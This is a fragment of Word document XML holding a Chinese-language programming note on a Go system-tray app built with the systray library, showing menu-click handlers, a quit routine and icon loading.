          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuBottom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>toggle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mToggle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>toggle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mQuit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>直接终止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>onReady</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Quit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Quit2 now..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>经过测试，此处不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>也可以令程序退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA90A3" w14:textId="77777777" w:rsidR="008C1F31" w:rsidRDefault="008C1F31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F77877" w14:textId="131B9EF6" w:rsidR="00225D59" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实战小托盘（基本弃用，我是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的托盘部分替代原始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12784780" w14:textId="77777777" w:rsidR="008C1F31" w:rsidRDefault="008C1F31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3989304E" w14:textId="77777777" w:rsidR="00F07663" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E197C" w14:textId="77777777" w:rsidR="00F07663" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.Run(onReady, nil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794C6A5D" w14:textId="7DBC3D50" w:rsidR="008C1F31" w:rsidRPr="00F07663" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71745136" w14:textId="77777777" w:rsidR="00F07663" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>onReady</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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t>iconBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>err := ioutil.ReadFile(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"icon.ico"</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>处理错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
